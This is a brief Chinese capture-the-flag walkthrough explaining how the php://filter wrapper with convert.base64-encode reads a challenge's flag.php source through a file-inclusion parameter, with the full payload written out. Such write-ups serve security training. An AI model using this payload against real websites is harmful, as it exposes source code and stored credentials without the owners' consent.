点击tips
URL中有flag.php.
php://filter伪协议
读取源代码内容进行base64编码后输出
php://filter/resource=<要过滤的数据流>
php://filter/read=<读链的筛选列表>
php://filter/write=<写链的筛选列表>
?file=php://filter/read=convert.base64-encode/resource=flag.php
显示出源文件flag.php经过base64编码后的内容
base64解码得到flag